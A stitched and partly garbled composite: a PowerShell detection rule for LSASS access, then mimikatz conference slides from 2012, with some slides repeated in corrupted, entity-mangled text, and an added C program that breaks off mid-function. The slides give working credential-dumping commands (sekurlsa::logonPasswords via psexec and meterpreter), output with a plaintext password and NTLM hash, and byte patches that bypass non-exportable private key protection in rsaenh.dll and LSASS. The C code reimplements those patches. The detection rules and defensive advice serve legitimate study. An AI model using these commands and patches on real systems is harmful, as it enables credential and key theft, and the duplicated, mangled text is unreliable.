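    if ($Event.Id -ne 10 -or $Event.TargetImage -notmatch '\\lsass\.exe$') { return $null }
    $mask = [int]$Event.GrantedAccess          # accepts the '0x...' form Sysmon logs
    $why = @()
    if ($mask -band $PROCESS_VM_READ)       { $why += 'VM_READ' }        # sekurlsa without injection: just reading
    if ($mask -band $PROCESS_VM_WRITE)      { $why += 'VM_WRITE' }       # crypto::patchcng: one byte written in LSASS
    if ($mask -band $PROCESS_CREATE_THREAD) { $why += 'CREATE_THREAD' }  # DLL injection via CreateRemoteThread
    if ($why.Count -eq 0 -or $AllowedLsassReaders -contains $Event.SourceImage) { return $null }
    [pscustomobject]@{
        Rule    = 'lsass-access'
        Process = $Event.SourceImage
        Detail  = '{0} (GrantedAccess 0x{1:x})' -f ($why -join '+'), $mask
    }
}

function Test-DebugPrivilege {
    # Security Event 4703 (token right adjusted): SubjectUserName, ProcessName, EnabledPrivilegeList
    param([pscustomobject]$Event)
    if ($Event.Id -ne 4703 -or $Event.EnabledPrivilegeList -notmatch 'SeDebugPrivilege') { return $null }
    [pscustomobject]@{
        Rule    = 'debug-privilege'
        Process = $Event.ProcessName
        Detail  = "SeDebugPrivilege enabled by $($Event.SubjectUserName)"
    }
}

# Constructed sample records (not real logs): one mimikatz-like sequence, benign ones around it
$Events = @(
    [pscustomobject]@{ Id = 4703; SubjectUserName = 'gentilkiwi'; ProcessName = 'C:\tools\mimikatz.exe'
                       EnabledPrivilegeList = 'SeDebugPrivilege' }
    [pscustomobject]@{ Id = 10; SourceImage = 'C:\tools\mimikatz.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1438' }
    [pscustomobject]@{ Id = 10; SourceImage = 'C:\Windows\System32\csrss.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1fffff' }
    [pscustomobject]@{ Id = 10; SourceImage = 'C:\Windows\System32\svchost.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1000' }
    [pscustomobject]@{ Id = 4703; SubjectUserName = 'SYSTEM'; ProcessName = 'C:\Windows\System32\svchost.exe'
                       EnabledPrivilegeList = 'SeAssignPrimaryTokenPrivilege' }
)

# Only the two mimikatz.exe records should come out: the csrss.exe handle is allow-listed
# and the svchost.exe handle (0x1000, QUERY_LIMITED_INFORMATION) carries no memory rights.
$alerts = $Events | ForEach-Object { Test-DebugPrivilege $_; Test-LsassAccess $_ } | Where-Object { $_ }
$alerts | Format-Table -AutoSize
```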
mimikatz sekurlsa: what we can do
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
[Diagram: mod_mimikatz_crypto]
mimikatz crypto: how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Constraint for most users / Unavailable for computer keys)
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto / capi: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto / capi: how it's exported ( level)
[Diagram: the process asks CryptoAPI and the RSA CSP to export a key; inside the process itself the CSP does the DPAPI decode and loads the private key ("PLAYSKOOL"). Exportable? yes: Exported Key; no: NTE_BAD_KEY_STATE.]
mimikatz crypto / patchcapi: because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto / patch CAPI: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz output (translated from French):
    mimikatz # crypto::exportCertificates
    Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
      - Benjamin Delpy
        Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportable    : NO
        Key size      : 2048
        Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
        Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK
certutil output (translated from French):
    ================ Certificate 0 ================
    Serial Number: 112169417a1c3ef46a301f99385f50680fa0
    Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Subject: CN=Benjamin Delpy, C=FR
    Non-root Certificate
    Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
      Provider = Microsoft Enhanced Cryptographic Provider v1.0
    Private key is NOT exportable
    Encryption test passed
    CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
    CertUtil: Key not valid for use in specified state.
Both tools get 0x8009000b (NTE_BAD_KEY_STATE): the "Exportable: NO" flag is enforced by CPExportKey, in the caller's own process.
mimikatz crypto / patch CAPI: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space: let's patch it.
I wrote "4" bytes in my memory space (2 bytes at each of two sites in rsaenh.dll):
    .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
becomes
    .text:0AC0B7CB 90                   nop
    .text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

    .text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
becomes
    .text:0AC1F749 90                   nop
    .text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
The 6-byte jnz rel32 (0F 85 + displacement) is replaced by a 1-byte nop and a 5-byte jmp rel32 (E9 + the same displacement): both end on the same address, so the displacement bytes stay valid and the branch that used to depend on the exportable flag is now always taken.
mimikatz crypto / patch CAPI: demo time
Import, export, import as not exportable... export.
mimikatz crypto / patch CAPI: limitations
Because:
- I'm lazy
- In the majority of real-life cases I've seen RSA keys
  - Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz crypto / CNG: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
- http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz crypto / CNG: how it's exported
[Diagram: the process asks CNG to export a key; the request goes over RPC to the KeyIso service hosted in the LSASS process, which loads the private key (DPAPI decode) and checks the Exportable flag: yes -> exported key, no -> NTE_NOT_SUPPORTED. On NT6, LSASS is a system-protected SYSTEM process carrying the ML_SYSTEM mandatory label (SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP).]
mimikatz crypto / patch CNG: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz output (translated from French):
    mimikatz # crypto::exportKeys
    [user] CNG keys
      - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportable : NO
        Key size   : 2048
        Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.
This time the error is 0x80090029 (NTE_NOT_SUPPORTED), returned by the KSP from inside LSASS, not by a DLL in our own process.
mimikatz crypto / patch CNG: because sometimes I own LSASS
This time checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
    .text:6C815210 75 1C    jnz short continue_key_export
becomes
    .text:6C815210 EB 1C    jmp short continue_key_export
The short jnz (75 rel8) and the short jmp (EB rel8) have the same length, so only the opcode byte changes and the 8-bit displacement is kept.
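The two patches above (the 2 x 2 bytes in rsaenh!CPExportKey and the 1 byte in ncrypt's SPCryptExportKey) are the same transformation: a conditional jnz becomes an unconditional jmp with an unchanged target. The program below is an added example, not mimikatz code, that applies that rewrite to constructed buffers holding the bytes printed on the slides and checks the branch target before and after; the function names (decode_branch, patch_jnz_to_jmp, patch_and_verify) are mine. It never touches rsaenh.dll or LSASS: on Windows the same write needs VirtualProtect in your own process, or OpenProcess + WriteProcessMemory with SeDebugPrivilege for LSASS.

```c
/* Added example, not mimikatz code: both byte patches on the slides
 * (rsaenh!CPExportKey for CAPI, ncrypt!SPCryptExportKey in LSASS for CNG)
 * rewrite a conditional jnz into an unconditional jmp with the same target.
 * Buffers below are constructed from the bytes printed on the slides. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint32_t target;      /* address after the instruction + displacement */
    size_t   length;      /* encoded instruction length */
    int      conditional; /* 1 for jnz, 0 for jmp */
} branch_t;

/* Little-endian signed 32-bit displacement. */
static int32_t read_disp32(const uint8_t *p)
{
    return (int32_t)((uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                     ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24));
}

/* Decode jnz/jmp at code[off] (75 rel8, EB rel8, 0F 85 rel32, E9 rel32);
 * base is the virtual address of code[0].  Returns 0 if none is there. */
static int decode_branch(const uint8_t *code, size_t len, size_t off,
                         uint32_t base, branch_t *out)
{
    uint32_t addr = base + (uint32_t)off;
    if (off + 2 <= len && (code[off] == 0x75 || code[off] == 0xEB)) {
        out->length = 2;
        out->conditional = (code[off] == 0x75);
        out->target = addr + 2 + (uint32_t)(int32_t)(int8_t)code[off + 1];
        return 1;
    }
    if (off + 6 <= len && code[off] == 0x0F && code[off + 1] == 0x85) {
        out->length = 6;
        out->conditional = 1;
        out->target = addr + 6 + (uint32_t)read_disp32(code + off + 2);
        return 1;
    }
    if (off + 5 <= len && code[off] == 0xE9) {
        out->length = 5;
        out->conditional = 0;
        out->target = addr + 5 + (uint32_t)read_disp32(code + off + 1);
        return 1;
    }
    return 0;
}

/* Make the jnz at code[off] unconditional without touching its displacement:
 *   75 xx             -> EB xx              (1 byte: the CNG patch)
 *   0F 85 dd dd dd dd -> 90 E9 dd dd dd dd  (2 bytes: the CAPI patch)
 * nop + 5-byte jmp ends where the 6-byte jnz ended, so rel32 stays valid.
 * Returns bytes written, 0 if there is no jnz at off. */
static size_t patch_jnz_to_jmp(uint8_t *code, size_t len, size_t off)
{
    if (off + 2 <= len && code[off] == 0x75) {
        code[off] = 0xEB;
        return 1;
    }
    if (off + 6 <= len && code[off] == 0x0F && code[off + 1] == 0x85) {
        code[off] = 0x90;
        code[off + 1] = 0xE9;
        return 2;
    }
    return 0;
}

/* Patch in place and verify: 1 only if a jnz became an unconditional jmp
 * that still lands on the original target (stored in *target_out). */
static int patch_and_verify(uint8_t *code, size_t len, size_t off,
                            uint32_t base, uint32_t *target_out)
{
    branch_t before, after;
    size_t skip = 0;
    if (!decode_branch(code, len, off, base, &before) || !before.conditional)
        return 0;
    if (patch_jnz_to_jmp(code, len, off) == 0)
        return 0;
    while (off + skip < len && code[off + skip] == 0x90) /* step over the nop */
        skip++;
    if (!decode_branch(code, len, off + skip, base, &after) || after.conditional)
        return 0;
    if (target_out)
        *target_out = after.target;
    return after.target == before.target;
}

int main(void)
{
    /* Constructed buffers: bytes and addresses as printed on the slides. */
    uint8_t capi1[] = { 0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF }; /* rsaenh .text:0AC0B7CB */
    uint8_t capi2[] = { 0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF }; /* rsaenh .text:0AC1F749 */
    uint8_t cng[]   = { 0x75, 0x1C };                         /* ncrypt .text:6C815210 */
    uint32_t t = 0;
    int ok;
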